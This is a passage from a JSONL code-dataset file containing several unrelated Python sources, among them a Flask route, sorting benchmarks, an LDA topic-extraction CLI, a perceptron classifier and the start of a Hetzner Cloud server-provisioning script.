dataset_info = Table(\n        [\n            {\n                \"name\": \"Total Number of Records\",\n                \"value\": summary[\"table\"][\"n\"],\n                \"fmt\": \"fmt_numeric\",\n            },\n            {\n                \"name\": \"Total Number of Columns\",\n                \"value\": summary[\"table\"][\"n_var\"],\n                \"fmt\": \"fmt_numeric\",\n            },\n            {\n                \"name\": \"Missing row cells\",\n                \"value\": summary[\"table\"][\"n_cells_missing\"],\n                \"fmt\": \"fmt_numeric\",\n            },\n            {\n                \"name\": \"Missing row cells (%)\",\n                \"value\": summary[\"table\"][\"p_cells_missing\"],\n                \"fmt\": \"fmt_percent\",\n            },\n            {\n                \"name\": \"Duplicate rows\",\n                \"value\": summary[\"table\"][\"n_duplicates\"],\n                \"fmt\": \"fmt_numeric\",\n            },\n            {\n                \"name\": \"Duplicate rows (%)\",\n                \"value\": summary[\"table\"][\"p_duplicates\"],\n                \"fmt\": \"fmt_percent\",\n            },\n        ],\n        name=\"Table statistics\",\n    )\n\n    dataset_types = Table(\n        [\n            {\"name\": type_name, \"value\": count, \"fmt\": \"fmt_numeric\"}\n            for type_name, count in summary[\"table\"][\"types\"].items()\n        ],\n        name=\"Variable types\",\n    )\n\n    return Sequence(\n        [dataset_info, dataset_types],\n        anchor_id=\"dataset_overview\",\n        name=\"Overview\",\n        sequence_type=\"grid\",\n    )\n\n\ndef get_dataset_warnings(warnings, count):\n    return Warnings(warnings=warnings, name=f\"Analysis Summary ({count})\", anchor_id=\"Analysis\")\n\n\ndef get_dataset_reproduction(summary, date_start, date_end):\n    version = summary[\"package\"][\"pandas_profiling_version\"]\n    config = quote(summary[\"package\"][\"pandas_profiling_config\"])\n    return Table(\n        [\n            {\"name\": \"Analysis started\", \"value\": date_start, \"fmt\": \"fmt\"},\n            {\"name\": \"Analysis finished\", \"value\": date_end, \"fmt\": \"fmt\"},\n        ],\n        name=\"Run Statistics\",\n        anchor_id=\"run_statistics\",\n    )\n","sub_path":"overview.py","file_name":"overview.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"248939084","text":"#!/usr/bin/python3\n\"\"\"\nA python script that uses flask\n\"\"\"\n\nfrom flask import Flask, render_template\nfrom models import storage, State\nfrom flask import escape\n\napp = Flask(__name__)\n\n\n@app.route('/states', strict_slashes=False)\n@app.route('/states/<id>', strict_slashes=False)\ndef show_states_and_cities(id=None):\n    '''\n    Displays states and cities by state id\n    '''\n    state_dict = storage.all(State)\n    found = None\n    if id is not None:\n        for state in state_dict.values():\n            if state.id == id:\n                found = state\n                break\n    return render_template('9-states.html', state_dict=state_dict,\n                           id=id, found=found)\n\n\n@app.teardown_appcontext\ndef teardown_db(self):\n    '''\n    Removes the current SQLAlchemy Session\n    '''\n    storage.close()\n\nif __name__ == \"__main__\":\n    app.run(host='0.0.0.0')\n","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"316581590","text":"print(\"20190314546 李吉洁\")   # replace the student ID and name with your own information\n\nimport socket\nname=socket.gethostname()\nip = socket.gethostbyname(name)\n\nimport platform\nosname=platform.platform()\n\nimport datetime\nnow=datetime.datetime.now()\n\nprint(name, ip)\nprint(osname)\nprint(now)","sub_path":"homework/homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"595263461","text":"#!/usr/bin/env python\n\n# Calculate if a point is within a box\n# check 
if a point is inside a given box. \n#\n# Parameters:\n# pt: list of 2 numbers (x,y)\n# box: list of 4 numbers (x,y,w,h). x,y is the top left point. w,h is the width and height\n\ndef point_in_box(pt, box):\n px,py = pt\n bx,by,w,h = box\n if px >= bx and px < (bx + w) and py >= by and py < (by+h):\n return True\n else:\n return False\n","sub_path":"hw08/collision_funcs.py","file_name":"collision_funcs.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"75845485","text":"# The MIT License (MIT)\n# Copyright (c) 2016, 2017 by the ESA CCI Toolbox development team and contributors\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of\n# this software and associated documentation files (the \"Software\"), to deal in\n# the Software without restriction, including without limitation the rights to\n# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies\n# of the Software, and to permit persons to whom the Software is furnished to do\n# so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport matplotlib\nimport matplotlib.cm as cm\n\n__author__ = \"Norman Fomferra (Brockmann Consult GmbH)\"\n\nLAND_COVER_CCI_CMAP = 'land_cover_cci'\n\n\ndef register_lc_color_map():\n lc_color_mappings = [\n (0, dict(r=0, g=0, b=0)),\n (10, dict(r=255, g=255, b=100)),\n (11, dict(r=255, g=255, b=100)),\n (12, dict(r=255, g=255, b=0)),\n (20, dict(r=170, g=240, b=240)),\n (30, dict(r=220, g=240, b=100)),\n (40, dict(r=200, g=200, b=100)),\n (50, dict(r=0, g=100, b=0)),\n (60, dict(r=0, g=160, b=0)),\n (61, dict(r=0, g=160, b=0)),\n (62, dict(r=170, g=200, b=0)),\n (70, dict(r=0, g=60, b=0)),\n (71, dict(r=0, g=60, b=0)),\n (72, dict(r=0, g=80, b=0)),\n (80, dict(r=40, g=80, b=0)),\n (81, dict(r=40, g=80, b=0)),\n (82, dict(r=40, g=100, b=0)),\n (90, dict(r=120, g=130, b=0)),\n (100, dict(r=140, g=160, b=0)),\n (110, dict(r=190, g=150, b=0)),\n (120, dict(r=150, g=100, b=0)),\n (121, dict(r=120, g=75, b=0)),\n (122, dict(r=150, g=100, b=0)),\n (130, dict(r=255, g=180, b=50)),\n (140, dict(r=255, g=220, b=210)),\n (150, dict(r=255, g=235, b=175)),\n (151, dict(r=255, g=205, b=120)),\n (152, dict(r=255, g=210, b=120)),\n (153, dict(r=255, g=235, b=175)),\n (160, dict(r=0, g=120, b=190)),\n (170, dict(r=0, g=150, b=120)),\n (180, dict(r=0, g=220, b=130)),\n (190, dict(r=195, g=20, b=0)),\n (200, dict(r=255, g=245, b=215)),\n (201, dict(r=220, g=220, b=220)),\n (202, dict(r=255, g=245, b=215)),\n (210, dict(r=0, g=70, b=200)),\n (220, dict(r=255, g=255, b=255)),\n ]\n\n classes = {lc: color for lc, color in lc_color_mappings}\n\n invalid_rgba = (0, 0, 0, 0.5)\n class_0_rgba = (0, 0, 0, 0)\n\n rgba_list = []\n num_entries = 256\n last_rgba = invalid_rgba\n for i in range(num_entries):\n color = classes.get(i)\n if color:\n last_rgba = (color['r'] / 255, color['g'] / 
255, color['b'] / 255, 1.0)\n rgba_list.append(last_rgba)\n rgba_list[0] = class_0_rgba\n\n cmap = matplotlib.colors.ListedColormap(rgba_list, name=LAND_COVER_CCI_CMAP, N=num_entries)\n cm.register_cmap(cmap=cmap)\n","sub_path":"cate/util/im/cmap_lc.py","file_name":"cmap_lc.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"285001937","text":"import time\r\nimport random\r\n\r\ndef sort1(alist):\r\n for passnum in range(len(alist)-1,0,-1):\r\n for i in range(passnum):\r\n if alist[i]>alist[i+1]:\r\n temp = alist[i]\r\n alist[i] = alist[i+1]\r\n alist[i+1] = temp\r\n\r\ndef sort2(alist):\r\n if len(alist)>1:\r\n mid = len(alist)//2\r\n lefthalf = alist[:mid]\r\n righthalf = alist[mid:]\r\n\r\n sort2(lefthalf)\r\n sort2(righthalf)\r\n\r\n i=0\r\n j=0\r\n k=0\r\n while i < len(lefthalf) and j < len(righthalf):\r\n if lefthalf[i] < righthalf[j]:\r\n alist[k]=lefthalf[i]\r\n i=i+1\r\n else:\r\n alist[k]=righthalf[j]\r\n j=j+1\r\n k=k+1\r\n\r\n while i < len(lefthalf):\r\n alist[k]=lefthalf[i]\r\n i=i+1\r\n k=k+1\r\n\r\n while j < len(righthalf):\r\n alist[k]=righthalf[j]\r\n j=j+1\r\n k=k+1\r\n\r\ndef sort3(alist, size):\r\n buckets = []\r\n for j in range(size):\r\n buckets.append(0)\r\n for i in range(size):\r\n buckets[alist[i]] += 1\r\n i = 0\r\n for j in range(size):\r\n for k in range(buckets[j]):\r\n alist[i] = j\r\n i += 1\r\n \r\n\r\nsize = int(input(\"List size? (choose a number between 10 to 1000, 0 to exit) \"))\r\nwhile (size > 0):\r\n listOfNumbers = []\r\n for x in range(size):\r\n listOfNumbers.append(random.randint(0, size-1))\r\n startTime = time.time()\r\n sort1(listOfNumbers)\r\n print ('sort1 took', (time.time() - startTime)*1000, 'milliseconds.')\r\n listOfNumbers = []\r\n for x in range(size):\r\n listOfNumbers.append(random.randint(0, size-1))\r\n startTime = time.time()\r\n sort2(listOfNumbers)\r\n print ('sort2 took', (time.time() - startTime)*1000, 'milliseconds.')\r\n listOfNumbers = []\r\n for x in range(size):\r\n listOfNumbers.append(random.randint(0, size-1))\r\n startTime = time.time()\r\n sort3(listOfNumbers, size)\r\n print ('sort3 took', (time.time() - startTime)*1000, 'milliseconds.')\r\n size = int(input(\"List size? 
(choose a number between 10 to 1000, 0 to exit) \"))\r\n    \r\n","sub_path":"csp2016/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"123863224","text":"from putils import my_print, is_resource_exists\nimport nltk\nimport pandas as pd\nimport datetime as dt\nfrom topics_extractor.topics_truncate import truncate_topics_tables  # used by the db 'train' branch in __main__\nfrom itertools import chain, tee\nfrom topics_extractor.lda_mw_handler import LDAMWHandler\nimport argparse\nimport datetime\nfrom parameters_extractor.metrics.content_check import is_text\nfrom peewee_classes import *  # Topics/Parameters/Resources models used below\nfrom psettings import *\nfrom putils import get_articles_from_db, get_articles_from_csv\nfrom multiprocessing import Pool\n\nnltk.data.path.append(DEFAULT_PROJECT_PATH + 'nltk_data/')\n\nCONTENT_CALLBACKS = (\n\tLDAMWHandler(),\n)\n\n\ndef get_topic(text, element_type, resource_name, is_csv=False):\n\tparams = {'topic': None, 'element_type': element_type}\n\n\tif text is not None:\n\t\tif type(text) is str:\n\t\t\tif text != '':\n\t\t\t\tparams = {k: v for k, v in chain.from_iterable(\n\t\t\t\t\t[callback(text, resource_name, is_csv=is_csv) for callback in CONTENT_CALLBACKS])}\n\n\t\t\t\tparams['element_type'] = element_type\n\n\treturn params\n\n\ndef topic_ltc_by_resource(lead_title_content_resource, is_csv=False):\n\ttry:\n\t\tlead, title, content, res, aid = lead_title_content_resource\n\texcept Exception as e:\n\t\tlead, title, content, res = lead_title_content_resource\n\t\taid = None\n\n\tl_params, t_params, c_params = LEAD_ELEMENT_TYPE, TITLE_ELEMENT_TYPE, CONTENT_ELEMENT_TYPE\n\n\tlead_params_topic = get_topic(lead, l_params, res, is_csv=is_csv)\n\ttitle_params_topic = get_topic(title, t_params, res, is_csv=is_csv)\n\tcontent_params_topic = get_topic(content, c_params, res, is_csv=is_csv)\n\n\tif aid is not None:\n\t\treturn aid, lead_params_topic, title_params_topic, content_params_topic\n\n\treturn lead_params_topic, title_params_topic, content_params_topic\n\n\ndef save_parameters(params, art):\n\tparams['article'] = art\n\n\ttry:\n\t\tt_id = Topics.select(Topics.topic).where(Topics.value == params['topic']).get().topic\n\n\t\tparams['topic'] = t_id\n\n\t\tp_obj_if_exists = Parameters.select().where((\n\t\t\tParameters.article == art.article) & (Parameters.element_type == params['element_type'])).get()\n\n\t\tparams['updated_at'] = dt.datetime.today().date()\n\n\t\tfor k, v in params.items():\n\t\t\tsetattr(p_obj_if_exists, k, v)\n\n\t\tp_obj_if_exists.save()\n\n\texcept Parameters.DoesNotExist:\n\t\tparams['created_at'] = dt.datetime.today().date()\n\t\tParameters.create(**params)\n\n\n# def _process_group_parameters(callback, params, texts):\n#     for params, result in zip(params, callback(texts)):\n#         k, v = result\n#         params[k] = v\n#         yield params\n\ndef save_topics_to_csv(save_to_file_path, df):\n\ttry:\n\t\tdf.to_csv(save_to_file_path)\n\t\tmy_print(\"{} Topics saved to [ {} ]\".format(SUCCESS_FLAG, save_to_file_path))\n\texcept Exception as e:\n\t\tmy_print(\"{} Can't save topics to [ {} ]\".format(ERROR_FLAG, save_to_file_path))\n\n\ndef merge_topics_with_in_csv(input_file_path, save_to_file_path, df, on='id', how='outer'):\n\ttry:\n\t\tdf_in = pd.read_csv(input_file_path)\n\n\t\tif df_in.index.name is None or df_in.index.name != on:\n\t\t\tdf_in.set_index([on], inplace=True)\n\n\t\tdfinal = df_in.merge(df, on=on, how=how)\n\t\tno_unnamed_columns = [i for i in dfinal.columns if \"Unnamed\" not in 
i]\n\n\t\tdfinal = dfinal[no_unnamed_columns]\n\n\t\tdfinal.to_csv(save_to_file_path)\n\t\tmy_print(\"{} Topics saved to [ {} ]\".format(SUCCESS_FLAG, save_to_file_path))\n\texcept Exception as e:\n\t\tmy_print(\"{} {}\".format(EXCEPTION_FLAG, e))\n\t\tmy_print(\"{} Can't save topics to [ {} ]\".format(ERROR_FLAG, save_to_file_path))\n\n\ndef run(resource=None, period=None, last_added_only=False, data_type=None, csv_data_input_file_path=None, csv_data_output_file_path=None):\n\tgtime_start = datetime.datetime.now()\n\n\tif data_type == 'db':\n\t\tif resource is None:\n\t\t\trdata = Resources.select().iterator()\n\t\t\tresources_iterator = [elem.__data__['resource'] for elem in rdata]\n\t\telse:\n\t\t\tif is_resource_exists(resource):\n\t\t\t\tresources_iterator = [resource]\n\t\t\telse:\n\t\t\t\tmy_print(\"{}Resource [ {} ] not found. Exiting ...\".format(ERROR_FLAG, resource))\n\t\t\t\treturn\n\n\t\tps_resources = (get_articles_from_db(resource_id=r_id, period=period, last_added_only=last_added_only) for r_id in resources_iterator)\n\n\t\tfor ps, res in zip(ps_resources, resources_iterator):\n\t\t\tltime_start = datetime.datetime.now()\n\n\t\t\tps, articles_s, data = tee(ps, 3)\n\n\t\t\t# check content; process if it's not too short or empty\n\t\t\tdata = ((p.lead, p.title, p.content, res) for p in data if (is_text(p, None)[0]))\n\n\t\t\tpool = Pool()\n\n\t\t\tparams = pool.map(topic_ltc_by_resource, data)\n\n\t\t\tfor art, prms in zip(articles_s, params):\n\t\t\t\tfor par in prms:\n\t\t\t\t\tif par is not None:\n\t\t\t\t\t\tsave_parameters(par, art)\n\n\t\t\tmy_print(\"{} [ {} ] :: LDA topics calculated in {}\".format(SUCCESS_FLAG, res, datetime.datetime.now() - ltime_start))\n\n\t\t\tdel pool\n\n\t\tif len(resources_iterator) != 1:\n\t\t\tmy_print(\"{}{} :: calculated in {}\".format(SUCCESS_FLAG, \" \".join(resources_iterator), datetime.datetime.now() - gtime_start))\n\n\telif data_type == 'csv':\n\t\tif resource is None:\n\t\t\traise Exception(\"Resource can't be undefined for csv data_type.\")\n\n\t\tps_csv_resource = get_articles_from_csv(resource, csv_data_input_file_path)\n\n\t\tltime_start = datetime.datetime.now()\n\n\t\tps, articles_s, data = tee(ps_csv_resource, 3)\n\n\t\tif csv_data_output_file_path is not None:\n\t\t\toutput_file = csv_data_output_file_path\n\t\telse:\n\t\t\toutput_file = \"{}_topics.csv\".format(resource)\n\n\t\tcsv_resource_topics_df = pd.DataFrame()\n\n\t\tpool = Pool()\n\t\ta_tmps = (pool.map(_process_csv_pool, data))\n\n\t\tfor tmp in a_tmps:\n\t\t\tcsv_resource_topics_df = csv_resource_topics_df.append([tmp])\n\n\t\tdel pool\n\n\t\tcsv_resource_topics_df.set_index('id', inplace=True)\n\n\t\tmy_print(\n\t\t\t\"{} [ {} ] :: LDA topics calculated in {}\".format(SUCCESS_FLAG, resource, datetime.datetime.now() - ltime_start))\n\n\t\t# save_topics_to_csv(output_file, csv_resource_topics_df)\n\t\tmerge_topics_with_in_csv(csv_data_input_file_path, output_file, csv_resource_topics_df)\n\telse:\n\t\tpass\n\n\ndef _process_csv_pool(a_tuple):\n\ta_id = a_tuple[-1]\n\tprms = topic_ltc_by_resource(a_tuple, is_csv=True)\n\n\ttmp = {\n\t\t'id': a_id,\n\t\t'element_type_{}_topic'.format(prms[1]['element_type']): prms[1]['topic'],\n\t\t'element_type_{}_topic'.format(prms[2]['element_type']): prms[2]['topic'],\n\t\t'element_type_{}_topic'.format(prms[3]['element_type']): prms[3]['topic'],\n\t}\n\n\treturn tmp\n\n\ndef train_models_for_resources(data_type, resources, resource_lang_csv=None, csv_data_file_path=None):\n\tresources_names_list = []\n\n\tif data_type == 'db':\n\t\tif resources 
is None:\n\t\t\tresources_all = Resources.select(Resources.resource).iterator()\n\t\t\tresources_names_list = [i.__data__['resource'] for i in resources_all]\n\t\telse:\n\t\t\tresources_names_list = [resources]\n\n\telif data_type == 'csv':\n\t\tresources_names_list = [resources]\n\n\tif len(resources_names_list) == 0:\n\t\traise Exception(\"Resources not defined. Set -r or --resource variable.\")\n\n\tfor resource_name in resources_names_list:\n\t\tLDAMWHandler().train(data_type=data_type, resource=resource_name, res_lang=resource_lang_csv, csv_data_file_path=csv_data_file_path)\n\n\tmy_print(\"{}Train finished.\\n\".format(SUCCESS_FLAG))\n\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\n\tsubparsers = parser.add_subparsers(title='dtype')\n\n\t# add db subparser\n\tparser_db = subparsers.add_parser('db')\n\n\t# db add defaults\n\tparser_db.set_defaults(resource=None, updkw=False, period=None, which='db')\n\n\tparser_db.add_argument('--method', '-m', required=True, dest='method')\n\tparser_db.add_argument('--resource', '-r', dest='resource')\n\tparser_db.add_argument('--period', '-p', dest='period')\n\n\t# new --last-added-only\n\tparser_db.add_argument('--last-added-only', action='store_true', dest='last_added_only', default=False)\n\n\t# add csv subparser\n\tparser_csv = subparsers.add_parser('csv')\n\n\t# csv add defaults\n\tparser_csv.set_defaults(input_file=None, resource_lang_csv=None, output_file=None, which='csv')\n\n\tparser_csv.add_argument('--method', '-m', required=True, dest='method')\n\tparser_csv.add_argument('--resource', '-r', dest='resource')\n\tparser_csv.add_argument('--resource-lang-csv', '-rlc', dest='resource_lang_csv')\n\tparser_csv.add_argument('--input-file', '-in', dest='input_file', help='Input csv file with data')\n\tparser_csv.add_argument('--output-file', '-out', dest='output_file', help='Output csv file name')\n\tparser_csv.add_argument('--parallelize', '-p', nargs='?', default=True, dest='parallelize',\n\t\t\t\t\t\t\thelp='Add a parallelization opportunity')\n\n\targs = parser.parse_args()\n\n\tif args.which == 'csv':\n\t\tif args.input_file is None:\n\t\t\traise Exception(\"Input_data parameter cant be None. 
Set --input-file or -in \")\n\t\telse:\n\t\t\t\"\"\"\n\t\t\t\tCSV file must be in format ID == i[1][2] Lead i[1][1] Title i[1][0] Content i[1][2]\n\t\t\t\t\n\t\t\t\"\"\"\n\t\t\tdata_file_path = args.input_file\n\n\t\t\tif args.method == 'train':\n\t\t\t\ttrain_models_for_resources(data_type='csv', resources=args.resource, resource_lang_csv=args.resource_lang_csv, csv_data_file_path=data_file_path)\n\n\t\t\telif args.method == 'evaluate':\n\t\t\t\trun(resource=args.resource, data_type=args.which, csv_data_input_file_path=args.input_file, csv_data_output_file_path=args.output_file)\n\n\n\telif args.which == 'db':\n\t\tif args.method == 'train':\n\t\t\ttruncate_topics_tables(args.resource)\n\t\t\ttrain_models_for_resources(data_type='db', resources=args.resource)\n\n\t\telif args.method == 'evaluate':\n\t\t\trun(resource=args.resource, period=args.period, last_added_only=args.last_added_only, data_type=args.which)\n","sub_path":"topics_extractor/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":9348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"5078252","text":"import numpy as np\r\nfrom matplotlib.colors import ListedColormap\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib\r\nimport matplotlib.patches as patches\r\n\r\n\r\nclass HardSVM(object):\r\n '''\r\n Author: Ethan Steidl\r\n Constructor for class\r\n rate - (float) learning rate\r\n niter - (int) number of iterations\r\n weights - (Array[float]) weights for perceptron. Weights are 1 larger than Features in\r\n hypothoses class. Index 0 represents the bias.\r\n errors - (Array[int]) number of errors per itteration. On fit convergence last elemnt will\r\n be 0\r\n '''\r\n\r\n def __init__(self, rate=0.01, itterations=10):\r\n self.rate = rate\r\n self.itterations = itterations # number of itterations\r\n self.weights = np.empty\r\n self.errors = []\r\n self.features = 0\r\n\r\n '''\r\n Author: Ethan Steidl\r\n Will alter internal weights to produce a model that maps the input data X\r\n to the training data y. 
creating the hypothesis weights.\r\n\r\n    param X - (DataFrame) Input data\r\n    param y - (DataFrame) Desired output\r\n\r\n    return self - returns this object as a model since weights are stored\r\n    '''\r\n\r\n    def fit(self, X, y):\r\n\r\n        # clear errors array from previous fit if there was one\r\n        self.errors.clear()\r\n\r\n        self.features = X.shape[1]\r\n        self.weights = [0 for x in range(X.shape[1] + 1)]  # 1 more weight for bias than features ie cols\r\n\r\n        # main loop to fit the data to the labels\r\n        for i in range(self.itterations):\r\n            # set iteration error to zero\r\n            misclass = 0\r\n\r\n            # loop over all the objects in X and corresponding y element\r\n            for xi, target in zip(X, y):\r\n                # calculate the needed (delta_w) update from previous step\r\n                # delta_w = rate * (target – prediction current object)\r\n                delta_w = self.rate * (target - self.predict(xi))\r\n\r\n                # calculate what the current object will add to the weight\r\n                self.weights[1:] = self.weights[1:] + (delta_w * xi)\r\n\r\n                # accumulate the current delta_w into the bias\r\n                self.weights[0] += delta_w\r\n\r\n                # increase the iteration error if delta_w != 0\r\n                if (delta_w != 0):\r\n                    misclass += 1\r\n\r\n            # update the misclassification array with the number of errors in this iteration\r\n            self.errors.append(misclass)\r\n            # if there was convergence, stop looping\r\n            if (misclass == 0):\r\n                break\r\n\r\n        return self\r\n\r\n    '''\r\n    Author: Christer Karlsson\r\n    Returns the dot product of the input data and the weights with the bias\r\n    added to each element.\r\n\r\n    param X - (DataFrame) Input data\r\n\r\n    return z - the result of X.Weights + bias\r\n    '''\r\n\r\n    def net_input(self, X):\r\n        \"\"\"Calculate net input\"\"\"\r\n        # return the dot product: X.w + bias\r\n        try:\r\n            z = X.dot(self.weights[1:]) + self.weights[0]\r\n        except:\r\n            z = np.array([0 for x in range(self.features)])\r\n\r\n        return z\r\n\r\n    '''\r\n    Author: Christer Karlsson\r\n    Given a Matrix X of vectors, creates a temp vector the size of the amount \r\n    of vectors. For each vector in Matrix X, if the vector's values represent a pass,\r\n    the corresponding index in the temp vector is set to 1. Else it is set to \r\n    -1. The temp vector is then returned.\r\n\r\n    param X - (DataFrame) Input data\r\n\r\n    return - Vector of length of X with 1's and -1's\r\n    '''\r\n\r\n    def predict(self, X):\r\n        \"\"\"Return class label after unit step\"\"\"\r\n        return np.where(self.net_input(X) >= 0.0, 1, -1)\r\n\r\n    '''\r\n    Author: Christer Karlsson\r\n    This function will plot the input data X and color the differing types different\r\n    colors. A line will be drawn across the graph where the perceptron classifies each\r\n    element as a pass or fail. Passes are in the red highlighted area and fails are in the\r\n    blue highlighted area\r\n\r\n    Added small change to remove error. 
when calling plt.scatter, the color needs to be an np\r\n    array.\r\n\r\n    param X - (DataFrame) Input data\r\n    param y - (DataFrame) Training Set\r\n    param resolution - (float) resolution on graph\r\n\r\n    return void\r\n    '''\r\n\r\n    def plot_decision_regions(self, X, y, resolution=0.02):\r\n        # setup marker generator and color map\r\n        markers = ('s', 'x', 'o', '^', 'v')\r\n        colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\r\n        cmap = ListedColormap(colors[:len(np.unique(y))])\r\n        # plot the decision surface\r\n        x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\r\n        x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\r\n        xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\r\n                               np.arange(x2_min, x2_max, resolution))\r\n        Z = self.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\r\n        Z = Z.reshape(xx1.shape)\r\n        plt.contourf(xx1, xx2, Z, alpha=0.4, cmap=cmap)\r\n        plt.xlim(xx1.min(), xx1.max())\r\n        plt.ylim(xx2.min(), xx2.max())\r\n        # plot class samples\r\n        for idx, cl in enumerate(np.unique(y)):\r\n            plt.scatter(x=X[y == cl, 0], y=X[y == cl, 1],\r\n                        alpha=0.8, c=np.array([cmap(idx)]),\r\n                        marker=markers[idx], label=cl)\r\n\r\n        plt.show()","sub_path":"HardSVM.py","file_name":"HardSVM.py","file_ext":"py","file_size_in_byte":5519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"462822798","text":"#! /usr/bin/python3\n#\n# hcloud_py/make_machine.py -- a rewrite of hcloud_tf/make_machine.sh without using terraform.\n# (C) 2020 jw@owncloud.com -- distribute under GPLv2 or ask.\n#\n# We want to make the HCLOUD_SSHKEY_NAMES variable obsolete.\n# This can be done by checking $HOME/.ssh/ for existing private/public key pairs.\n# The public key of an existing pair could then be added to the newly created machine.\n# This technique is more reliable (and less cumbersome) than uploading and naming correct keys \n# with HCLOUD_SSHKEY_NAMES. Hcloud maintains keys per project. You need to re-upload when switching projects.\n#\n# With terraform, we support an additional HCLOUD_SSHKEY variable, where such a private key can be \n# specified. Its use is however discouraged, and cannot reliably be automated, as terraform fails if we specify a key\n# that was already uploaded. Also with terraform there is no way to inspect uploaded keys and avoid such conflicts.\n\n# See also:\n#   https://github.com/hetznercloud/hcloud-python/tree/master/examples\n#\n# Requires:\n#   sudo -H pip3 install hcloud\n#\nimport os, sys, string, random, base64, hashlib, argparse, subprocess\n\nfrom hcloud import Client\nfrom hcloud.images.domain import Image\nfrom hcloud.ssh_keys.domain import SSHKey\nfrom hcloud.server_types.domain import ServerType\n\nhcloud_api_token = os.environ.get('HCLOUD_TOKEN')\nif hcloud_api_token is None:\n    print(\"Environment variable HCLOUD_TOKEN not set.\", file=sys.stderr)\n    sys.exit(1)\nssh_key_names = os.environ.get('HCLOUD_SSHKEY_NAMES', '')\nserver_image = \"ubuntu-20.04\"\ndatacenter = \"fsn1-dc14\"\nserver_type = \"cx21\"\ndebug = False\n\nparser = argparse.ArgumentParser(description=sys.argv[0]+\" V0.1\")\nparser.add_argument('-i', '--image', type=str, default=server_image, help=\"server image. Default: \"+server_image)\nparser.add_argument('-t', '--type', type=str, default=server_type, help=\"server type. Default: \"+server_type)\nparser.add_argument('-d', '--datacenter', type=str, default=datacenter, help=\"server datacenter. 
Default: \"+datacenter)\nparser.add_argument('-s', '--ssh-key-names', type=str, help=\"comma-separated names of uploaded public keys. Default: env HCLOUD_SSHKEY_NAMES\", default=ssh_key_names)\nparser.add_argument('-p', '--packages', type=str, help=\"comma-separated list of linux packages to install\")\nparser.add_argument('-u', '--unique', action='store_true', help=\"make name unique by prepending user and appending a suffix\")\nparser.add_argument('-l', '--login', action='store_true', help=\"ssh into the machine, when ready\")\nparser.add_argument('MACHINE_NAME', nargs='?', help=\"optional machine name\")\nargs = parser.parse_args()\nNAME = args.MACHINE_NAME\nif not NAME: NAME = args.image\nNAME = NAME.translate( { ord('.'):ord('-'), ord('_'):ord('-') } ) # avoid _ and . in name. Always\n\nclient = Client(token=hcloud_api_token)\n\nif debug:\n # list all servers in this project\n for s in client.servers.get_all(): \n sd = s.data_model\n print(\"%-12s\" % sd.name, \"%-15s\" % sd.public_net.ipv4.ip if sd.public_net else None, sd.server_type.data_model.name, sd.image.name if sd.image else None, sd.created, sd.status, sd.labels, file=sys.stderr)\n \n # list all ssh-keys in this project\n for k in client.ssh_keys.get_all(): \n kd = k.data_model\n print(kd.fingerprint, kd.created, kd.name, kd.labels, file=sys.stderr)\n\nssh_key_names = args.ssh_key_names.split(',') if len(args.ssh_key_names) else []\npackages = args.packages.split(',') if args.packages else []\n\n# from http://stackoverflow.com/questions/6682815/deriving-an-ssh-fingerprint-from-a-public-key-in-python\ndef ssh_fingerprint(str):\n key = base64.b64decode(str.encode('ascii'))\n fp_plain = hashlib.md5(key).hexdigest()\n return ':'.join(a+b for a,b in zip(fp_plain[::2], fp_plain[1::2]))\n\nsshdir = os.environ.get('HOME')+'/.ssh/'\nif not ssh_key_names:\n # match local keys with hcloud keys\n for file in [ 'id_ed25519', 'id_ecdsa', 'id_dsa', 'id_rsa' ]:\n if os.access(sshdir+file+'.pub', 0) and os.access(sshdir+file, 0):\n pub = open(sshdir+file+'.pub', 'r').read().split()\n fp = ssh_fingerprint(pub[1])\n known_key = client.ssh_keys.get_by_fingerprint(fp)\n if known_key:\n ssh_key_names.append(known_key.data_model.name)\n print(\"hcloud ssh-key '%s' matches '%s.pub'\" % (known_key.data_model.name, sshdir+file), file=sys.stderr)\n break\n\nssh_pub_key = None\nif not ssh_key_names:\n # grab a key from the local home. 
